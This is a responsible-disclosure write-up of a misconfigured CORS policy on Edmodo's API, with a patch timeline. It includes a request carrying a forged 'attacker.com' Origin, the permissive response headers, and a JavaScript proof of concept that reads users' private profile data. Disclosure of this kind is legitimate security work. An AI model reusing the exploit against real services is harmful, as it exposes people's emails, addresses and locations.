2. Edmodo Users Private Information Disclosure : CORS Exploitation.md

🔰 Edmodo Users Private Information Disclosure : CORS Exploitation

Disclosure of Edmodo Users Private Information using mis-configured CORS exploitation

I hope you read my previous post on "Mis-configured CORS Exploitation".

so let's continue..

Edmodo CORS Request:

After updating some information on edmodo, I got a URL that sends a GET request along with an access token in order to fetch the users private information. therefore, i changed the Origin and confirmed that it is unsafe for CORS or not.

Request:

GET /profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC..... HTTP/1.1

Host: api.edmodo.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://www.edmodo.com/home

Origin: https://www.attacker.com

Connection: keep-alive

and the Response was,

Response:

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH

Access-Control-Allow-Origin: https://www.attacker.com

Access-Control-Expose-Headers: Link, X-Total-Count

Access-Control-Max-Age: 1728000

Cache-Control: max-age=0, private, must-revalidate

Content-Type: application/json; charset=utf-8

Date: Tue, 08 Aug 2017 21:11:39 GMT

ETag: W/"8907834cb797c5c5c71eb4073ec1234"

Server: nginx

Strict-Transport-Security: max-age=16070400; includeSubDomains

Vary: Accept-Encoding, Origin

X-RateLimit-Limit: 1000000

X-RateLimit-Remaining: 999778

X-Request-Id: ee8aa9fc-7473-4477-913c-1504a556564e

X-Runtime: 0.203002

Content-Length: 1315

Connection: keep-alive



[JSON Data : user credentials…]

So, It was mis-configure CORS request, allowed ACAO: https://www.attacker.com , ACAC: true with user credentials.

also here, I noticed that Access Tokens are valid for a long period of time (or never expire) and with the help of this Access Token i can be able to get the private data of other users. (this was another issue, which we will discuss later in another blog)

So now we have our Vulnerable Endpoint: https://api.edmodo.com/profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC.....

CORS Exploitation :

After creating a CORS exploitation POC, i upload it on my server.

function cors() {

var xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function() {

if (this.readyState == 4 && this.status == 200) {

document.getElementById("demo").innerHTML = this.responseText;

}

};

xhttp.open("GET", "https://api.edmodo.com/profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC.....", true);

xhttp.withCredentials; //default:false

xhttp.send();

}

Once a logged-in Edmodo user clicks on the Exploit button, their personal information will be disclosed, like : email address, secondary email address, home address, city, zip code, state, country, latitude, longitude, created date, role, about, etc..

---

Timeline:

Aug 09, 2017 : Reported Date (CORS Exploitation)

Aug 11, 2017 : Report Triaged

Sep 24, 2017 : Reported Additional Info. Read here

Oct 12, 2017 : Bug Patched [CORS still present ; but restricted the access of getting private information]

Happy Hunting…!!! 🔱

Next Post 🔰 : IDOR + JWT Token - Edmodo All Users Private Information Disclosure